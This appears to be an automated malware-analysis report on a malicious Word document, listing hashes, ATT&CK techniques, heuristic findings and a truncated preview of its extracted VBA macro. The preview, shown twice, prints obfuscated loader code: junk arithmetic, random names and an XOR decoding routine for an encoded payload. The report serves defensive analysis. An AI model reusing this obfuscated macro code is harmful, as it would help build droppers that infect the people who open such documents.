Office (OLE) malware analysis — malicious · 24bea836dd7e84c7

MALICIOUS

Office (OLE)

244.0 KB Created: 2015-12-02 23:10:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: 3a800cd6aaecf09a6d3e97bdbd5dc323 SHA-1: 360342efa5f1709c00344011d3f5b63bd3b7aace SHA-256: 24bea836dd7e84c7ecf28caeb241c767beebd342e6c565098835efcbf6cf5db6

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious content. The specific shell command and its target are not fully discernible due to obfuscation, but the intent is clear.

Heuristics 6

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29267 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29267 bytes
SHA-256: `e06fdb4f1eb0fcd18f8099b5c2a7ebb4d21c6bfd03315a8006a56133a06e5473`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function GiJ9I Lib "VZl2jXB0TfPLAVxLP" Alias "SFEPRxzli4Uv" (ByVal IMyu9xt7z As String, GaCs94wYX As Long) As Long #Else Private Declare Function GiJ9I lib "VZl2jXB0TfPLAVxLP" Alias "SFEPRxzli4Uv"(byval IMyu9xt7z as String, GaCs94wYX as Long ) as Long #End If Function PNpXLK8o(ByVal OHDdt0ekYTjz As String, PpDmw0bAgJzVlFuiP As String) As String L9qkxD = 22 If L9qkxD + W5hXH > 1 Then W5hXH = 98 + 17 + 62 + 52 '9 MIygzgzILi 12 74 End If W5hXH = 14 + 24 '39 19 80 RHCopM67DyGfl1 On Error Resume Next LTj5y5Of7I = 5 If LTj5y5Of7I + WLFsKgW4PbXeHMS > 1 Then WLFsKgW4PbXeHMS = 51 + 85 + 9 + 85 '80 WfUx9l5MmyV 69 5 End If WLFsKgW4PbXeHMS = 98 + 42 '11 32 43 MpZYDkIC18FWG3 Dim KeaRw2() As Byte, HcytMmAdkZet4a(0 To 285) As Integer, L8t3sl0mNQkb() As Byte, HmqWa09RDPe80h9m, FuEgEP6iBFa, VFdCR, U9V3LJlV, PhJsUyH0 As Boolean HZfsw12CI0kAQ = 63 If HZfsw12CI0kAQ + K5aiEucUMyP > 1 Then K5aiEucUMyP = 26 + 65 + 75 + 90 '70 Pc18aXjP 32 49 End If K5aiEucUMyP = 50 + 47 '56 1 14 DNdLgU6ObBS KeaRw2 = StrConv(OHDdt0ekYTjz, (64 + 8 + 64 - 8)) IpY4dW = 6 If IpY4dW + KBOshPs4PbxO > 1 Then KBOshPs4PbxO = 51 + 15 + 71 + 2 '64 KM7BB2g36UpXg 76 14 End If KBOshPs4PbxO = 29 + 9 '69 60 61 GpgmSf2 L8t3sl0mNQkb() = StrConv(PpDmw0bAgJzVlFuiP, (64 + 8 + 64 - 8)) SM0vm = 10 If SM0vm + B0baBxRHvcmPLW > 1 Then B0baBxRHvcmPLW = 42 + 71 + 12 + 88 '7 NpdyekcBs9xeJZ 52 42 End If B0baBxRHvcmPLW = 98 + 3 '65 4 14 SffM6Wm5ZfYKvsXwg FuEgEP6iBFa = UBound(L8t3sl0mNQkb) B1CsPVUA = 37 If B1CsPVUA + CJmry1afIFbs > 1 Then CJmry1afIFbs = 92 + 52 + 22 + 13 '91 IlSYyPHTAJMD 31 12 End If CJmry1afIFbs = 94 + 21 '41 8 7 Of3czD7TQ1XTP0 For HmqWa09RDPe80h9m = 0 To (127.5 + 5 + 127.5 - 5) HcytMmAdkZet4a(HmqWa09RDPe80h9m) = HmqWa09RDPe80h9m Next HmqWa09RDPe80h9m For HmqWa09RDPe80h9m = (128 + 4 + 128 - 4) To (142.5 + 6 + 142.5 - 6) HcytMmAdkZet4a(HmqWa09RDPe80h9m) = HmqWa09RDPe80h9m Xor (128 + 2 + 128 - 2) Next HmqWa09RDPe80h9m For HmqWa09RDPe80h9m = 1 To (3 + 4 + 3 - 4) HcytMmAdkZet4a(HmqWa09RDPe80h9m + (124.5 + 4 + 124.5 - 4)) = L8t3sl0mNQkb(FuEgEP6iBFa - HmqWa09RDPe80h9m) HcytMmAdkZet4a(HmqWa09RDPe80h9m - 1) = L8t3sl0mNQkb(HmqWa09RDPe80h9m - 1) Xor ((127.5 + 6 + 127.5 - 6) - L8t3sl0mNQkb(FuEgEP6iBFa - HmqWa09RDPe80h9m)) Next HmqWa09RDPe80h9m PhJsUyH0 = False VFdCR = 0 U9V3LJlV = 0 For HmqWa09RDPe80h9m = 0 To UBound(KeaRw2) If VFdCR > FuEgEP6iBFa Then VFdCR = 0 If U9V3LJlV > (142.5 + 1 + 142.5 - 1) And PhJsUyH0 = False Then U9V3LJlV = 0: PhJsUyH0 = Not (PhJsUyH0) If U9V3LJlV > (142.5 + 5 + 142.5 - 5) And PhJsUyH0 = True Then U9V3LJlV = (2.5 + 6 + 2.5 - 6): PhJsUyH0 = Not (PhJsUyH0) KeaRw2(HmqWa09RDPe80h9m) = (KeaRw2(HmqWa09RDPe80h9m) Xor (HcytMmAdkZet4a(U9V3LJlV) Xor L8t3sl0mNQkb(VFdCR))) VFdCR = VFdCR + 1 U9V3LJlV = U9V3LJlV + 1 Next HmqWa09RDPe80h9m VKCfH = 12 If VKCfH + NFzTNHfQqt7 > 1 Then NFzTNHfQqt7 = 48 + 64 + 44 + 5 '95 Uvu5l2VfFFK6Qgg6 96 93 End If NFzTNHfQqt7 = 3 + 74 '87 1 33 PxYJ93 PNpXLK8o = StrConv(KeaRw2(), (32 + 1 + 32 - 1)) BRrWDsYgx53Uo = 42 If BRrWDsYgx53Uo + YJiQi1BNz4F9CjFkl > 1 Then YJiQi1BNz4F9CjFkl = 83 + 85 + 4 + 23 '13 WjKLQ09cCW 69 36 End If YJiQi1BNz4F9CjFkl = 74 + 13 '3 82 43 OIkav1oKp2TS End Function Sub WIZ464w8tTiV() UvuxDqjzmDmwfr = 55 If UvuxDqjzmDmwfr + QO2DOKKPi > 1 Then QO2DOKKPi = 59 + 54 + 63 + 89 '82 UklvxnCSfk 50 75 End If QO2DOKKPi = 25 + 25 '77 93 18 VqxhLB55j7D Dim VnF2N5wu As String, W6qkcS89p4DCCqfoh() As String, DyUhUqmNXYednCd6N As Integer EcT3K9z = 74 If EcT3K9z + QZsf7SkfWiEjF46 > 1 Then QZsf7SkfWiEjF46 = 34 + 3 + 94 + 72 '13 YbO1 93 76 End If QZsf7SkfWiEjF46 = 3 + 23 '89 88 64 OhD9Zsi VnF2N5wu = VnF2N5wu & "164,160,218,190,192,183,34,21,31,12,122,64,12,29,116,19,52,87,10,98,5,65,101,96,43,38,98,75,67,115,107,41,34, ... (truncated)

SHA-256: e06fdb4f1eb0fcd18f8099b5c2a7ebb4d21c6bfd03315a8006a56133a06e5473

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function GiJ9I Lib "VZl2jXB0TfPLAVxLP" Alias "SFEPRxzli4Uv" (ByVal IMyu9xt7z As String, GaCs94wYX As Long) As Long
#Else
Private Declare Function GiJ9I lib "VZl2jXB0TfPLAVxLP" Alias "SFEPRxzli4Uv"(byval IMyu9xt7z as String, GaCs94wYX as Long ) as Long
#End If
Function PNpXLK8o(ByVal OHDdt0ekYTjz As String, PpDmw0bAgJzVlFuiP As String) As String
L9qkxD = 22
If L9qkxD + W5hXH > 1 Then
W5hXH = 98 + 17 + 62 + 52
'9 MIygzgzILi 12 74
End If
W5hXH = 14 + 24
'39 19 80 RHCopM67DyGfl1
On Error Resume Next
LTj5y5Of7I = 5
If LTj5y5Of7I + WLFsKgW4PbXeHMS > 1 Then
WLFsKgW4PbXeHMS = 51 + 85 + 9 + 85
'80 WfUx9l5MmyV 69 5
End If
WLFsKgW4PbXeHMS = 98 + 42
'11 32 43 MpZYDkIC18FWG3
Dim KeaRw2() As Byte, HcytMmAdkZet4a(0 To 285) As Integer, L8t3sl0mNQkb() As Byte, HmqWa09RDPe80h9m, FuEgEP6iBFa, VFdCR, U9V3LJlV, PhJsUyH0 As Boolean
HZfsw12CI0kAQ = 63
If HZfsw12CI0kAQ + K5aiEucUMyP > 1 Then
K5aiEucUMyP = 26 + 65 + 75 + 90
'70 Pc18aXjP 32 49
End If
K5aiEucUMyP = 50 + 47
'56 1 14 DNdLgU6ObBS
KeaRw2 = StrConv(OHDdt0ekYTjz, (64 + 8 + 64 - 8))
IpY4dW = 6
If IpY4dW + KBOshPs4PbxO > 1 Then
KBOshPs4PbxO = 51 + 15 + 71 + 2
'64 KM7BB2g36UpXg 76 14
End If
KBOshPs4PbxO = 29 + 9
'69 60 61 GpgmSf2
L8t3sl0mNQkb() = StrConv(PpDmw0bAgJzVlFuiP, (64 + 8 + 64 - 8))
SM0vm = 10
If SM0vm + B0baBxRHvcmPLW > 1 Then
B0baBxRHvcmPLW = 42 + 71 + 12 + 88
'7 NpdyekcBs9xeJZ 52 42
End If
B0baBxRHvcmPLW = 98 + 3
'65 4 14 SffM6Wm5ZfYKvsXwg
FuEgEP6iBFa = UBound(L8t3sl0mNQkb)
B1CsPVUA = 37
If B1CsPVUA + CJmry1afIFbs > 1 Then
CJmry1afIFbs = 92 + 52 + 22 + 13
'91 IlSYyPHTAJMD 31 12
End If
CJmry1afIFbs = 94 + 21
'41 8 7 Of3czD7TQ1XTP0
For HmqWa09RDPe80h9m = 0 To (127.5 + 5 + 127.5 - 5)
HcytMmAdkZet4a(HmqWa09RDPe80h9m) = HmqWa09RDPe80h9m
Next HmqWa09RDPe80h9m
For HmqWa09RDPe80h9m = (128 + 4 + 128 - 4) To (142.5 + 6 + 142.5 - 6)
HcytMmAdkZet4a(HmqWa09RDPe80h9m) = HmqWa09RDPe80h9m Xor (128 + 2 + 128 - 2)
Next HmqWa09RDPe80h9m
For HmqWa09RDPe80h9m = 1 To (3 + 4 + 3 - 4)
HcytMmAdkZet4a(HmqWa09RDPe80h9m + (124.5 + 4 + 124.5 - 4)) = L8t3sl0mNQkb(FuEgEP6iBFa - HmqWa09RDPe80h9m)
HcytMmAdkZet4a(HmqWa09RDPe80h9m - 1) = L8t3sl0mNQkb(HmqWa09RDPe80h9m - 1) Xor ((127.5 + 6 + 127.5 - 6) - L8t3sl0mNQkb(FuEgEP6iBFa - HmqWa09RDPe80h9m))
Next HmqWa09RDPe80h9m
PhJsUyH0 = False
VFdCR = 0
U9V3LJlV = 0
For HmqWa09RDPe80h9m = 0 To UBound(KeaRw2)
If VFdCR > FuEgEP6iBFa Then VFdCR = 0
If U9V3LJlV > (142.5 + 1 + 142.5 - 1) And PhJsUyH0 = False Then U9V3LJlV = 0: PhJsUyH0 = Not (PhJsUyH0)
If U9V3LJlV > (142.5 + 5 + 142.5 - 5) And PhJsUyH0 = True Then U9V3LJlV = (2.5 + 6 + 2.5 - 6): PhJsUyH0 = Not (PhJsUyH0)
KeaRw2(HmqWa09RDPe80h9m) = (KeaRw2(HmqWa09RDPe80h9m) Xor (HcytMmAdkZet4a(U9V3LJlV) Xor L8t3sl0mNQkb(VFdCR)))
VFdCR = VFdCR + 1
U9V3LJlV = U9V3LJlV + 1
Next HmqWa09RDPe80h9m
VKCfH = 12
If VKCfH + NFzTNHfQqt7 > 1 Then
NFzTNHfQqt7 = 48 + 64 + 44 + 5
'95 Uvu5l2VfFFK6Qgg6 96 93
End If
NFzTNHfQqt7 = 3 + 74
'87 1 33 PxYJ93
PNpXLK8o = StrConv(KeaRw2(), (32 + 1 + 32 - 1))
BRrWDsYgx53Uo = 42
If BRrWDsYgx53Uo + YJiQi1BNz4F9CjFkl > 1 Then
YJiQi1BNz4F9CjFkl = 83 + 85 + 4 + 23
'13 WjKLQ09cCW 69 36
End If
YJiQi1BNz4F9CjFkl = 74 + 13
'3 82 43 OIkav1oKp2TS
End Function
Sub WIZ464w8tTiV()
UvuxDqjzmDmwfr = 55
If UvuxDqjzmDmwfr + QO2DOKKPi > 1 Then
QO2DOKKPi = 59 + 54 + 63 + 89
'82 UklvxnCSfk 50 75
End If
QO2DOKKPi = 25 + 25
'77 93 18 VqxhLB55j7D
Dim VnF2N5wu As String, W6qkcS89p4DCCqfoh() As String, DyUhUqmNXYednCd6N As Integer
EcT3K9z = 74
If EcT3K9z + QZsf7SkfWiEjF46 > 1 Then
QZsf7SkfWiEjF46 = 34 + 3 + 94 + 72
'13 YbO1 93 76
End If
QZsf7SkfWiEjF46 = 3 + 23
'89 88 64 OhD9Zsi
VnF2N5wu = VnF2N5wu & "164,160,218,190,192,183,34,21,31,12,122,64,12,29,116,19,52,87,10,98,5,65,101,96,43,38,98,75,67,115,107,41,34,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.